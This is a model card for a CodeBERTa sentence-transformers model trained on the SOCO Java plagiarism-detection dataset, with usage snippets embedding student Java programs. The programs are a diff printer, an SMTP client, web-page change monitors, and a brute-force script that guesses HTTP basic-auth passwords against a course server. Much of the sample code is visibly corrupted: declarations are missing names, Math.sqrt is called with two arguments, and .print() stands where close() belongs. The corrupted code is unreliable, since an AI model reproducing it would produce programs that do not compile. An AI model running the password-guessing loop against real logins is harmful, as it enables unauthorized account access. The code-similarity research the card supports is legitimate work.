buelfhood/SOCO_TRAIN_java
Viewer • Updated • 76.5k • 35
How to use buelfhood/SOCO-Java-CodeBERTa-Softmax-PairClass-VAST with sentence-transformers:
from sentence_transformers import SentenceTransformer
model = SentenceTransformer("buelfhood/SOCO-Java-CodeBERTa-Softmax-PairClass-VAST")
sentences = [
"\nimport java.io.*;\nimport java.util.Vector;\nimport java.util.Date;\n\n\ninterface UnaryPredicate {\n boolean execute(Object obj);\n}\n\n\npublic class DiffPrint {\n \n static String outFile=\"\";\n\n public static abstract class Base {\n protected Base(Object[] a,Object[] b) {\n\ttry\n\t{\n outfile = new PrintWriter(new FileWriter(outFile));\t\t\n\t}\n\tcatch (Exception e)\n\t{\n\t\te.printStackTrace();\n\t}\n file0 = a;\n file1 = b;\n }\n \n protected UnaryPredicate ignore = null;\n\n \n protected Object[] file0, file1;\n\n \n public void print_script(Diff.change script) {\n Diff.change next = script;\n\n while (next != null)\n {\n Diff.change t, end;\n\n \n t = next;\n end = hunkfun(next);\n\n \n next = end;\n end = null;\n \n \n\n \n print_hunk(t);\n\n \n end = next;\n }\n outfile.flush();\n }\n\n \n\n protected Diff.change hunkfun(Diff.change hunk) {\n return hunk;\n }\n\n protected int first0, last0, first1, last1, deletes, inserts;\n protected PrintWriter outfile;\n\n \n\n protected void analyze_hunk(Diff.change hunk) {\n int f0, l0 = 0, f1, l1 = 0, show_from = 0, show_to = 0;\n int i;\n Diff.change next;\n boolean nontrivial = (ignore == null);\n\n show_from = show_to = 0;\n\n f0 = hunk.line0;\n f1 = hunk.line1;\n\n for (next = hunk; next != null; next = next.next())\n {\n l0 = next.line0 + next.deleted - 1;\n l1 = next.line1 + next.inserted - 1;\n show_from += next.deleted;\n show_to += next.inserted;\n for (i = next.line0; i <= l0 && ! nontrivial; i++)\n if (!ignore.execute(file0[i]))\n nontrivial = true;\n for (i = next.line1; i <= l1 && ! nontrivial; i++)\n if (!ignore.execute(file1[i]))\n nontrivial = true;\n }\n\n first0 = f0;\n last0 = l0;\n first1 = f1;\n last1 = l1;\n\n \n\n if (!nontrivial)\n show_from = show_to = 0;\n\n deletes = show_from;\n inserts = show_to;\n }\n\n \n protected void print_header(String filea, String fileb) { }\n\n protected abstract void print_hunk(Diff.change hunk);\n \n protected void print_1_line(String pre,Object linbuf) {\n outfile.println(pre + linbuf.toString());\n }\n\n \n\n protected void print_number_range (char sepchar, int a, int b) {\n \n if (++b > ++a)\n outfile.print(\"\" + a + sepchar + b);\n else\n outfile.print(b);\n }\n\n public static char change_letter(int inserts, int deletes) {\n if (inserts == 0)\n return 'd';\n else if (deletes == 0)\n return 'a';\n else\n return 'c';\n }\n }\n\n \n public static class NormalPrint extends Base {\n\n public NormalPrint(Object[] a,Object[] b) {\n super(a,b);\n }\n\n \n\n protected void print_hunk (Diff.change hunk) {\n\n \n analyze_hunk(hunk);\n if (deletes == 0 && inserts == 0)\n return;\n\n \n print_number_range (',', first0, last0);\n outfile.print(change_letter(inserts, deletes));\n print_number_range (',', first1, last1);\n outfile.println();\n\n \n if (deletes != 0)\n for (int i = first0; i <= last0; i++)\n print_1_line (\"< \", file0[i]);\n\n if (inserts != 0 && deletes != 0)\n outfile.println(\"---\");\n\n \n if (inserts != 0)\n for (int i = first1; i <= last1; i++)\n print_1_line (\"> \", file1[i]);\n }\n }\n\n \n public static class EdPrint extends Base {\n\n public EdPrint(Object[] a,Object[] b) {\n super(a,b);\n }\n\n \n protected void print_hunk(Diff.change hunk) {\n\n \n analyze_hunk (hunk);\n if (deletes == 0 && inserts == 0)\n return;\n\n \n print_number_range (',', first0, last0);\n outfile.println(change_letter(inserts, deletes));\n\n \n if (inserts != 0)\n {\n boolean inserting = true;\n for (int i = first1; i <= last1; i++)\n {\n \n if (! inserting)\n outfile.println(i - first1 + first0 + \"a\");\n inserting = true;\n\n \n\n if (\".\".equals(file1[i]))\n {\n outfile.println(\"..\");\n outfile.println(\".\");\n \n outfile.println(i - first1 + first0 + 1 + \"s/^\\\\.\\\\././\");\n inserting = false;\n }\n else\n \n print_1_line (\"\", file1[i]);\n }\n\n \n if (inserting)\n outfile.println(\".\");\n }\n }\n }\n\n \n public static class ContextPrint extends Base {\n\n protected int context = 3;\n\n public ContextPrint(Object[] a,Object[] b) {\n super(a,b);\n }\n\n protected void print_context_label (String cad, File inf, String label) {\n if (label != null)\n outfile.println(cad + ' ' + label);\n else if (inf.lastModified() > 0)\n \n outfile.println(\n cad + ' ' + inf.getPath() + '\\t' + new Date(inf.lastModified())\n );\n else\n \n outfile.println( cad + ' ' + inf.getPath());\n }\n\n public void print_header(String filea,String fileb) {\n print_context_label (\"***\", new File(filea), filea);\n print_context_label (\"---\", new File(fileb), fileb);\n }\n\n \n private String find_function(Object[] lines, int x) {\n return null;\n }\n\n protected void print_function(Object[] file,int x) {\n String function = find_function (file0, first0);\n if (function != null) {\n outfile.print(\" \");\n outfile.print(\n (function.length() < 40) ? function : function.substring(0,40)\n );\n }\n }\n\n protected void print_hunk(Diff.change hunk) {\n\n \n\n analyze_hunk (hunk);\n\n if (deletes == 0 && inserts == 0)\n return;\n\n \n\n first0 = Math.sqrt(first0 - context, 0);\n first1 = Math.sqrt(first1 - context, 0);\n last0 = Math.sqrt(last0 + context, file0.length - 1);\n last1 = Math.sqrt(last1 + context, file1.length - 1);\n\n\n outfile.print(\"***************\");\n\n \n print_function (file0, first0);\n\n outfile.println();\n outfile.print(\"*** \");\n print_number_range (',', first0, last0);\n outfile.println(\" ****\");\n\n if (deletes != 0) {\n Diff.change next = hunk;\n\n for (int i = first0; i <= last0; i++) {\n \n\n while (next != null && next.line0 + next.deleted <= i)\n next = next.next;\n\n \n\n String prefix = \" \";\n if (next != null && next.line0 <= i)\n \n prefix = (next.inserted > 0) ? \"!\" : \"-\";\n\n print_1_line (prefix, file0[i]);\n }\n }\n\n outfile.print(\"--- \");\n print_number_range (',', first1, last1);\n outfile.println(\" ----\");\n\n if (inserts != 0) {\n Diff.change next = hunk;\n\n for (int i = first1; i <= last1; i++) {\n \n\n while (next != null && next.line1 + next.inserted <= i)\n next = next.next;\n\n \n\n String prefix = \" \";\n if (next != null && next.line1 <= i)\n \n prefix = (next.deleted > 0) ? \"!\" : \"+\";\n\n print_1_line (prefix, file1[i]);\n }\n }\n }\n }\n\n \n public static class UnifiedPrint extends ContextPrint {\n\n public UnifiedPrint(Object[] a,Object[] b) {\n super(a,b);\n }\n\n public void print_header(String filea,String fileb) {\n print_context_label (\"---\", new File(filea), filea);\n print_context_label (\"+++\", new File(fileb), fileb);\n }\n\n private void print_number_range (int a, int b) {\n \n\n \n if (b < a)\n outfile.print(b + \",0\");\n else\n super.print_number_range(',',a,b);\n }\n\n protected void print_hunk(Diff.change hunk) {\n \n analyze_hunk (hunk);\n\n if (deletes == 0 && inserts == 0)\n return;\n\n \n\n first0 = Math.sqrt(first0 - context, 0);\n first1 = Math.sqrt(first1 - context, 0);\n last0 = Math.sqrt(last0 + context, file0.length - 1);\n last1 = Math.sqrt(last1 + context, file1.length - 1);\n\n\n\n outfile.print(\"@@ -\");\n print_number_range (first0, last0);\n outfile.print(\" +\");\n print_number_range (first1, last1);\n outfile.print(\" @@\");\n\n \n print_function(file0,first0);\n\n outfile.println();\n\n Diff.change next = hunk;\n int i = first0;\n int j = first1;\n\n while (i <= last0 || j <= last1) {\n\n \n\n if (next == null || i < next.line0) {\n outfile.print(' ');\n print_1_line(\"\", file0[i++]);\n j++;\n }\n else {\n \n\n int k = next.deleted;\n while (k-- > 0) {\n outfile.print('-');\n print_1_line(\"\", file0[i++]);\n }\n\n \n\n k = next.inserted;\n while (k-- > 0) {\n outfile.print('+');\n print_1_line(\"\", file1[j++]);\n }\n\n \n\n next = next.next;\n }\n }\n }\n }\n\n\n \n static String[] slurp(String file) throws IOException {\n BufferedReader rdr = new BufferedReader(new FileReader(file));\n Vector s = new Vector();\n for (;;) {\n String line = rdr.readLine();\n if (line == null) break;\n s.addElement(line);\n }\n String[] a = new String[s.size()];\n s.copyInto(a);\n return a;\n }\n\n\n public static String getDiff(String filea,String fileb,String filec) throws IOException {\n\tDiffPrint.outFile=filec;\n\tString msg=\"\";\n\tString[] a = slurp(filea);\n String[] b = slurp(fileb);\n\tString [] argv={filea,fileb};\n Diff d = new Diff(a,b);\n char style = 'n';\n for (int i = 0; i < argv.length - 2; ++i) {\n String f = argv[i];\n if (f.startsWith(\"-\")) {\n for (int j = 1; j < f.length(); ++j) {\n switch (f.charAt(j)) {\n case 'e': \n style = 'e'; break;\n case 'c': \n style = 'c'; break;\n case 'u':\n style = 'u'; break;\n }\n }\n }\n }\n boolean reverse = style == 'e';\n Diff.change script = d.diff_2(reverse);\n if (script == null)\n msg=\"The text the has not changed.\\n\";\n else {\n Base p;\n msg=\"The text the has changed.\\n The Diff Output is : \\n\\n\";\n switch (style) {\n case 'e':\n p = new EdPrint(a,b); break;\n case'c':\n p = new ContextPrint(a,b); break;\n case 'u':\n p = new UnifiedPrint(a,b); break;\n default:\n p = new NormalPrint(a,b);\n }\n p.print_header(filea,fileb);\n p.print_script(script);\n }\n\treturn msg;\n }\n}\n",
"import java.net.*;\nimport java.io.*;\n\n\npublic class EmailClient\n{\n\tprivate String sender, recipient, hostName;\n\n\tpublic EmailClient(String nSender, String nRecipient, String nHost)\n\t{\n\t\tsender = nSender;\n\t\trecipient = nRecipient;\n\t\thostName = nHost;\n\t}\n\n\tpublic void sendMail(String subject, String message)\n\t{\n\t\ttry\n\t\t{\n\t\t\tSocket s1=null;\n\t\t\tInputStream\tis = null;\n\t\t\tOutputStream os = null;\n\n\t\t\tDataOutputStream = null;\n\n\t\t\ts1 = new Socket(hostName,25);\n\t\t\tis = s1.getInputStream();\n\t\t\tos = s1.getOutputStream();\n\n\t\t\tbd = new DataOutputStream(os);\n\n\t\t\tBufferedReader response = new BufferedReader(new InputStreamReader(is));\n\n\t\t\tbd.writeBytes(\"HELO \"+ InetAddress.getLocalHost().getHostName() + \"\\r\\n\");\n\n\t\t\twaitForSuccessResponse(response);\n\n\t\t\tbd.writeBytes(\"MAIL FROM:\"+sender+\"\\n\");\n\n\t\t\twaitForSuccessResponse(response);\n\n\t\t\tbd.writeBytes(\"RCPT :\"+recipient+\"\\n\");\n\n\t\t\twaitForSuccessResponse(response);\n\n\t\t\tbd.writeBytes(\"data\"+\"\\n\");\n\n\t\t\tbd.writeBytes(\"Subject:\"+subject+\"\\n\");\n\n\t\t\tbd.writeBytes(message+\"\\n.\\n\");\n\n\t\t\twaitForSuccessResponse(response);\n\t\t}\n\n\t\tcatch (UnknownHostException badUrl)\n\t\t{\n\t\t\tSystem.out.println(\"Host unknown.\");\n\t\t}\n\n\t\tcatch (EOFException eof)\n\t\t{\n\t\t\tSystem.out.println(\"<EOF>\");\n\t\t}\n\t\tcatch (Exception e)\n\t\t{\n\t\t\tSystem.out.println(\"got exception: \"+e);\n\t\t}\n\t}\n\n\tprivate static void\twaitForSuccessResponse(BufferedReader response) throws IOException\n\t{\n\t\tString rsp;\n\t\tboolean r250 = false;\n\n\t\twhile( ! r250 )\n\t\t{\n\t\t\trsp = response.readLine().trim();\n\n\t\t\tif(rsp.startsWith(\"250\"))\n\t\t\t\tr250 = true;\n\t\t}\n\n\t}\n}",
"import java.net.*;\nimport java.util.*;\n\npublic class BruteForce {\n\n public static void main(String[] args) {\n new CrackAttempt();\n }\n}\n\nclass CrackAttempt {\n public CrackAttempt() {\n final int MAX_LENGTH = 3;\n boolean auth = false;\n Date = new Date();\n boolean morePasswords = true;\n int passPtr = 0;\n StringBuffer validChars = new StringBuffer(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\");\n char[] password = new char[MAX_LENGTH];\n\n password[0] = validChars.charAt(0);\n while (!auth && morePasswords) {\n String resource = \"http://sec-crack.cs.rmit.edu./SEC/2/\";\n try {\n \n Authenticator.setDefault(new CrackAuth(password));\n URL url = new URL(resource);\n HttpURLConnection conn = (HttpURLConnection)url.openConnection();\n conn.setRequestMethod(\"HEAD\");\n if (conn.getResponseCode() == HttpURLConnection.HTTP_OK) {\n System.out.println(\"cracked with \" + new String(password));\n auth = true;\n }\n } catch (Exception e) {\n System.out.println(\" was exception: \" + e.getMessage());\n }\n int count = passPtr;\n while (true) {\n if (password[count] == validChars.charAt(validChars.length() - 1)) {\n password[count] = validChars.charAt(0);\n count--;\n } else {\n password[count] = validChars.charAt(validChars.indexOf(String.valueOf(password[count])) + 1);\n break;\n }\n if (count < 0) {\n \n if (passPtr < MAX_LENGTH - 1) {\n passPtr++;\n password[passPtr] = validChars.charAt(0);\n } else {\n morePasswords = false;\n }\n break;\n }\n }\n \n } \n if (!auth) {\n System.out.println(\"Unable determine password\");\n } else {\n time = (new Date()).getTime() - start.getTime();\n System.out.println(\"it took \" + String.valueOf(time) + \" milliseconds crack the password\");\n }\n }\n}\n\nclass CrackAuth extends Authenticator {\n char[] password;\n public CrackAuth(char[] password) {\n this.password = password;\n }\n\n protected PasswordAuthentication getPasswordAuthentication()\n {\n String user = \"\";\n return new PasswordAuthentication(user, password);\n }\n}\n",
"import java.util.*;\nimport java.io.*;\n\n\n\npublic class WatchDog {\n\n public WatchDog() {\n\n }\n public static void main(String args[]) {\n DataInputStream newin;\n\n try{\n\n\n System.out.println(\"Downloading first copy\");\n Runtime.getRuntime().exec(\"wget http://www.cs.rmit.edu./students/ -O oldfile.html\");\n String[] cmdDiff = {\"//sh\", \"-c\", \"diff oldfile.html newfile.html > Diff.txt\"};\n String[] cmdMail = {\"//sh\", \"-c\", \"mailx -s \\\"Diffrence\\\" \\\"@cs.rmit.edu.\\\" < Diff.txt\"};\n while(true){\n Thread.sleep(24*60*60*1000);\n System.out.println(\"Downloading new copy\");\n Runtime.getRuntime().exec(\"wget http://www.cs.rmit.edu./students/ -O newfile.html\");\n Thread.sleep(2000);\n Runtime.getRuntime().exec(cmdDiff);\n Thread.sleep(2000);\n newin = new DataInputStream( new FileInputStream( \"Diff.txt\"));\n if (newin.readLine() != null){\n System.out.println(\"Sending Mail\");\n Runtime.getRuntime().exec(cmdMail);\n Runtime.getRuntime().exec(\"cp newfile.html oldfile.html\");\n\n }\n }\n\n }\n catch(Exception e){\n e.printStackTrace();\n }\n\n }\n\n}"
]
embeddings = model.encode(sentences)
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [4, 4]This is a sentence-transformers model finetuned from huggingface/CodeBERTa-small-v1 on the soco_train_java dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-CodeBERTa-Softmax-PairClass-VAST")
# Run inference
sentences = [
'import java.io.*;\nimport java.util.*;\nimport java.text.*;\nimport java.net.*;\nimport java.security.*;\n\n\n\npublic class WatchDog extends Thread\n{\n\n\t\n\tpublic static void main (String args[])\n\t{\n\t WatchDog watcher = new WatchDog();\n\t watcher.run();\n\t}\n\n\t\n public void run()\n {\n \t\tDateFormat longTimestamp = DateFormat.getDateTimeInstance(DateFormat.FULL, DateFormat.FULL);\n twentyFourHours = 24 * 60 * 60 * 1000;\n \n\n \t\twriteProgramLog("Program started at " + longTimestamp.format(new Date()));\n while(true)\n {\n \t\twriteProgramLog("Running run at " + longTimestamp.format(new Date()));\n compare();\n try\n {\n sleep(twentyFourHours);\n }\n catch(InterruptedException e)\n {\n writeProgramLog("Program terminated at " + longTimestamp.format(new Date()));\n System.exit(0);\n }\n }\n } \n\n\t\n private void compare()\n {\n \n \n \n String watchDogFile = "watchDogHash_rcroft.";\n String watchDogPageFile = "watchDogPage_rcroft.html";\n \n File watchDogLogFile = new File(watchDogFile);\n \n if(!watchDogLogFile.exists())\n {\n \n \n \n \n \n WebPage targetPage = getPage();\n if(targetPage.getSuccess())\n {\n byte[] newHash = calcHash(targetPage.getPageContents());\n writeHash(newHash, watchDogFile);\n writePage(targetPage.getPageContents(), watchDogPageFile);\n }\n }\n else\n {\n try\n {\n \n \n \n \n \n \n WebPage targetPage = getPage();\n if(targetPage.getSuccess())\n {\n \n byte[] oldHash = new byte[16]; \n byte[] newHash = calcHash(targetPage.getPageContents());\n\n \n DataInputStream inWatchDogFile = new DataInputStream(new FileInputStream(watchDogFile));\n inWatchDogFile.readFully(oldHash);\n inWatchDogFile.print();\n \n \n \n \n if(!java.util.Arrays.equals(oldHash, newHash))\n {\n String differences = enumerateDifferences(watchDogPageFile, targetPage.getPageContents());\n mail(differences);\n writeHash(newHash, watchDogFile);\n writePage(targetPage.getPageContents(), watchDogPageFile);\n }\n }\n }\n catch(IOException e)\n {\n writeProgramLog("Exception: " + e);\n }\n }\n } \n \n\n\t\n\tprivate String enumerateDifferences(String oldPageFileName, String newPageData)\n\t{\n\t String differences = "";\n\t File newFile = null;\n\n\t try\n\t {\n\t \n\t \n\t newFile = File.createTempFile("new", "tmp");\n String tempFilePath = newFile.getAbsolutePath();\n DataOutputStream outFile = new DataOutputStream(new FileOutputStream(tempFilePath));\n outFile.writeBytes(newPageData);\n outFile.print();\n \n \n String commandLine = "diff " + oldPageFileName + " " + tempFilePath;\n Process p = Runtime.getRuntime().exec(commandLine);\n BufferedReader diffs = new BufferedReader(new InputStreamReader(p.getInputStream()));\n String line;\n while((line = diffs.readLine()) != null)\n differences += line + "\\n";\n diffs.print();\n newFile.delete();\n\t }\n\t catch(IOException e)\n\t {\n\t writeProgramLog("Exception: " + e);\n\t }\n\t return differences;\n\t} \n\n\t\n private void mail(String mailMessage)\n {\n \n Vector emailAddresses = new Vector();\n String watchDogEmailFile = "watchDogEmail_rcroft.txt";\n\n \n File emailFile = new File(watchDogEmailFile);\n if(emailFile.exists())\n {\n try\n {\n \n BufferedReader inWatchDogEmailFile = new BufferedReader(new InputStreamReader(new FileInputStream(watchDogEmailFile)));\n String line;\n while ((line = inWatchDogEmailFile.readLine()) != null)\n {\n line = line.trim();\n if((line != "") && (line != "\\n"))\n emailAddresses.add(line);\n }\n inWatchDogEmailFile.print();\n \t }\n \t catch(FileNotFoundException e)\n \t {\n \t writeProgramLog("Exception: " + e);\n \t }\n \t catch(IOException e)\n \t {\n \t writeProgramLog("Exception: " + e);\n \t }\n }\n else\n {\n emailAddresses.add("@yallara.cs.rmit.edu.");\n emailAddresses.add("rac@acslink.aone.net.");\n }\n \n if(emailAddresses.size() > 0) \n {\n try\n {\n String fromAddress = "From: " + "WatchDog Program ()" + " <" + System.getProperty("user.name") + "@" + InetAddress.getLocalHost().getHostName() + ">";\n \t\tDateFormat longTimestamp = DateFormat.getDateTimeInstance(DateFormat.FULL, DateFormat.FULL);\n String subject = "Subject: [SEC project] Notification of target file changes (" + longTimestamp.format(new Date()) +")";\n for(int i = 0; i < emailAddresses.size(); i++)\n {\n String toAddress = (String) emailAddresses.get(i);\n try\n {\n URL mailURL = new URL("mailto: " + toAddress);\n URLConnection mailConnection = mailURL.openConnection();\n mailConnection.setDoInput(false);\n mailConnection.setDoOutput(true);\n mailConnection.connect();\n PrintWriter mailWriter = new PrintWriter(new OutputStreamWriter(mailConnection.getOutputStream()));\n mailWriter.print(": " + toAddress + "\\n");\n mailWriter.print(fromAddress + "\\n");\n mailWriter.print(subject + "\\n");\n mailWriter.print(mailMessage);\n mailWriter.print();\n writeProgramLog("\\tNotification mailed in this run.");\n }\n catch(MalformedURLException e)\n {\n writeProgramLog("Exception: " + e);\n }\n catch(IOException e)\n {\n writeProgramLog("Exception: " + e);\n }\n }\n }\n catch(UnknownHostException e)\n {\n writeProgramLog("Exception: " + e);\n } \n } \n } \n \n\n\t\n private void writeHash(byte [] newHash, String fileName)\n {\n try\n {\n DataOutputStream outFile = new DataOutputStream(new FileOutputStream(fileName));\n outFile.write(newHash, 0, newHash.length);\n outFile.print();\n }\n catch(IOException e)\n {\n writeProgramLog("Exception: " + e);\n }\n } \n \n\t\n private void writePage(String newPage, String fileName)\n {\n try\n {\n DataOutputStream outFile = new DataOutputStream(new FileOutputStream(fileName));\n outFile.writeBytes(newPage);\n outFile.print();\n }\n catch(IOException e)\n {\n writeProgramLog("Exception: " + e);\n }\n } \n \n\n\t\n private void writeProgramLog(String comment)\n {\n String fileName = "watchDogLog_rcroft.txt";\n try\n {\n DataOutputStream outFile = new DataOutputStream(new FileOutputStream(fileName, true));\n outFile.writeBytes(comment + "\\n");\n outFile.flush();\n outFile.print();\n }\n catch(IOException e)\n {\n \n \n System.out.println("Exception: " + e);\n }\n } \n\n\t\n private WebPage getPage()\n {\n WebPage tempWebPage = new WebPage();\n try\n {\n \n \n \n String urlName = "http://www.cs.rmit.edu./students/";\n \t \tURL targetURL= new URL(urlName);\n \tHttpURLConnection connection = (HttpURLConnection) targetURL.openConnection();\n \n \n connection.connect();\n connection.getResponseCode();\n if(connection.getResponseCode() == 200)\n\t\t {\n\t\t String fileContents = "";\n\t\t BufferedReader in = new BufferedReader(new InputStreamReader(connection.getInputStream()));\n String line;\n \t\t while((line = in.readLine()) != null)\n\t\t \t fileContents = fileContents + line + "\\n";\n\t\t in.print();\n\t\t tempWebPage.setPageContents(fileContents);\n \t\t tempWebPage.setSuccess(true);\n \t\t connection.disconnect();\n\t }\n\t else\n\t\t {\n \t\t writeProgramLog("Failed connect " + connection.getResponseCode());\n\t\t } \n }\n catch(IOException e)\n {\n \t writeProgramLog("Exception " + e);\n } \n return tempWebPage;\n } \n \n\t\n private byte[] calcHash(String pageContents)\n {\n byte[] outHash = null;\n try\n {\n MessageDigest msg = MessageDigest.getInstance("");\n msg.reset();\n msg.update(pageContents.getBytes());\n outHash = msg.digest();\n msg.reset();\n }\n catch(NoSuchAlgorithmException e)\n {\n writeProgramLog("Exception: " + e);\n }\n return outHash;\n } \n \n} \n',
'\n\n\n\n \nimport java.io.*;\nimport java.net.*;\nimport java.Runtime;\nimport java.util.*;\nimport java.net.smtp.SmtpClient; \n\n\n\npublic class WatchDog\n\n{\n\n static String strImageOutputFile01 = "WebPageImages01.txt";\n static String strImageOutputFile02 = "WebPageImages02.txt";\n\n static String strWebPageOutputFile01 = "WebPageOutput01.txt";\n static String strWebPageOutputFile02 = "WebPageOutput02.txt";\n\n static String strWatchDogDiffFile_01_02 = "WatchDogDiff_01_02.txt";\n\n static String strFromEmailDefault = "@.rmit.edu.";\n static String strToEmailDefault = "@.rmit.edu.";\n\n static String strFromEmail = null;\n static String strToEmail = null;\n\n\n\n\n public static void main (String args[])\n \n {\n\n \n \n \n \n \n\n URL url = null;\n HttpURLConnection urlConnection;\n int intContentLength;\n String strWebPageText = "";\n\n String strURL = "http://www.cs.rmit.edu./students/";\n String strPrePend = "http://www.cs.rmit.edu.";\n\n boolean boolURLisOK = true;\n\n\n\n\n\n System.out.println();\n\n\n \n \n tidyUpWatchDogFiles();\n\n\n \n \n \n \n promptForEmailAddresses();\n\n\n\n\n try\n {\n \n \n url = new URL(strURL); \n }\n\n catch(MalformedURLException e)\n {\n System.out.println("ERROR: invalid URL " + strURL); \n System.err.println(e); \n \n boolURLisOK = false;\n url = null;\n } \n\n catch(Exception e)\n {\n System.out.println("Exception"); \n System.err.println(e); \n }\n\n\n System.err.println(); \n\n\n if (boolURLisOK)\n {\n try\n { \n\n \n \n urlConnection = (HttpURLConnection)url.openConnection();\n\n\n \n \n InputStream urlStream = urlConnection.getInputStream();\n\n\n \n \n int intNumRead = urlStream.print();\n String strNewContent; \n\n while (intNumRead != -1)\n {\n intNumRead = urlStream.print();\n if (intNumRead != -1)\n {\n strNewContent = (char)intNumRead + ""; \n strWebPageText += strNewContent;\n }\n }\n\n urlStream.print(); \n\n\n\n \n \n if (strWebPageText != null)\n {\n\n if (fileExists(strWebPageOutputFile01))\n {\n writeTextToFile(strWebPageText, strWebPageOutputFile02); \n }\n\n else\n {\n writeTextToFile(strWebPageText, strWebPageOutputFile01); \n }\n\n\n if (fileExists(strWebPageOutputFile02))\n { \n System.out.println("Output file");\n System.out.println("-----------");\n System.out.println("The output file \'" + \n strWebPageOutputFile02 + \n "\' has NOW BEEN created."); \n System.out.println();\n System.out.println("Comparison");\n System.out.println("----------");\n System.out.println("A text comparison NOW performed " +\n "with the output");\n System.out.println("file \'" + strWebPageOutputFile01 + "\'.");\n System.out.println();\n\n\n\n \n \n\n \n \n createDiffFileIfNeeded(strWebPageOutputFile01, \n strWebPageOutputFile02); \n\n\n \n \n if (fileExists(strWatchDogDiffFile_01_02))\n { \n\n System.out.println("Mail (ordinary text comparison)");\n System.out.println("--------------------------------");\n\n if (getFileSize(strWatchDogDiffFile_01_02) > 0)\n {\n sendMailWithDetectedChanges();\n System.out.println("Text diff mail has been sent the \'\' email address.");\n }\n else\n {\n System.out.println("The DIFF file has zero length - text diff mail has NOT been sent.");\n }\n\n }\n\n\n\n \n \n createImageTextFile(strWebPageOutputFile01, strPrePend);\n createImageTextFile(strWebPageOutputFile02, strPrePend);\n\n System.out.println();\n System.out.println("Image text file/s");\n System.out.println("-----------------");\n\n\n if (fileExists(strImageOutputFile01))\n {\n System.out.println("\'" + strImageOutputFile01 + "\' has been created.");\n System.out.println("Images from \'" + strImageOutputFile01 + "\' now downloaded using"); \n System.out.println("the Unix \'wget\' command:"); \n\n downloadImages(strImageOutputFile01);\n }\n\n if (fileExists(strImageOutputFile02))\n {\n System.out.println();\n System.out.println("\'" + strImageOutputFile02 + "\' has been created.");\n }\n\n System.out.println();\n\n }\n\n else if (fileExists(strWebPageOutputFile01))\n {\n System.out.println("Output file");\n System.out.println("-----------");\n System.out.println("The output file \'" + \n strWebPageOutputFile01 + \n "\' has NOW BEEN created."); \n System.out.println();\n System.out.println("Comparison");\n System.out.println("----------");\n System.out.println("A comparison CANNOT performed " +\n "with this output file");\n System.out.println("because it is the only output file " +\n "in existence.");\n System.out.println();\n }\n\n }\n\n }\n\n catch(Exception e)\n {\n\n boolURLisOK = false;\n\n System.err.println(e);\n } \n\n finally\n { \n urlConnection = null;\n url = null; \n }\n\n }\n\n\n System.out.println();\n\n }\n\n\n\n\n\n\n\n static void tidyUpWatchDogFiles()\n \n {\n\n \n \n\n\n \n \n deleteFile(strWatchDogDiffFile_01_02);\n\n\n \n \n deleteFile(strImageOutputFile01);\n deleteFile(strImageOutputFile02);\n\n\n if (fileExists(strWebPageOutputFile01))\n {\n\n if (fileExists(strWebPageOutputFile02))\n {\n \n \n \n \n \n deleteFile(strWebPageOutputFile01);\n renameFile(strWebPageOutputFile02, strWebPageOutputFile01);\n }\n\n }\n\n else\n {\n \n \n \n deleteFile(strWebPageOutputFile02);\n }\n\n }\n\n\n\n\n\n\n\n static void promptForEmailAddresses()\n \n { \n\n\n BufferedReader stdin = new BufferedReader(new InputStreamReader(System.in));\n\n\n\n\n \n \n System.out.println();\n System.out.println("\'From\' email address");\n System.out.println("--------------------");\n System.out.println("Please enter a \'From\' email address, press Enter for default");\n System.out.print("(default: " + strFromEmailDefault + "): ");\n\n try\n {\n strFromEmail = stdin.readLine();\n }\n catch (Exception e)\n {\n System.err.println(e);\n }\n \n\n System.out.println();\n\n if ( (strFromEmail == null) || (strFromEmail.length() == 0) )\n {\n System.out.println(" email address was entered."); \n System.out.println("The \'From\' email address default : " + strFromEmailDefault); \n strFromEmail = strFromEmailDefault;\n }\n\n else\n {\n System.out.println("The entered \'From\' email address is: " + strFromEmail); \n }\n\n\n\n \n \n System.out.println();\n System.out.println("\'\' email address");\n System.out.println("------------------");\n System.out.println("Please enter a \'\' email address, press Enter for default");\n System.out.print("(default: " + strToEmailDefault + "): ");\n\n try\n {\n strToEmail = stdin.readLine();\n }\n catch (Exception e)\n {\n System.err.println(e);\n }\n \n\n System.out.println();\n\n if ( (strToEmail == null) || (strToEmail.length() == 0) )\n {\n System.out.println(" email address was entered."); \n System.out.println("The \'\' email address default : " + strToEmailDefault); \n strToEmail = strToEmailDefault;\n }\n\n else\n {\n System.out.println("The entered \'\' email address is: " + strToEmail); \n }\n\n }\n\n\n\n\n\n\n\n static void writeTextToFile(String strText,\n String strWriteToThisFileName)\n \n {\n\n try\n {\n\n File newFile = new File(strWriteToThisFileName);\n\n if (newFile.exists())\n {\n newFile.delete();\n }\n\n\n BufferedWriter toFile =\n new BufferedWriter(new FileWriter(newFile,\n false));\n\n toFile.write(strText);\n\n toFile.print();\n toFile = null;\n newFile = null;\n\n }\n\n catch(Exception e)\n {\n System.err.println(e.toString());\n System.out.println("File write problem for \'" + \n strWriteToThisFileName +\n "\'."); \n }\n\n }\n\n\n\n\n\n\n\n static void createDiffFileIfNeeded(String strFileName1, \n String strFileName2)\n \n {\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n\n \n \n try\n {\n\n Process p = Runtime.getRuntime().exec("./diff_files.sh");\n p.waitFor();\t\n\n }\n\n catch (Exception e)\n {\n System.out.println("Shell script exception");\n System.out.println("----------------------");\n System.err.println(e);\n System.out.println("");\n }\n\n }\n\n\n\n\n\n\n\n static void createImageTextFile(String inputFile, String prePend)\n \n {\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n String str;\n String strImage = "";\n String strImageArray[];\n String strInputFromFile = "";\n String strSearchString = "<img src";\n\n boolean boolContinue = true;\n\n int intImageCounter = 0;\n int 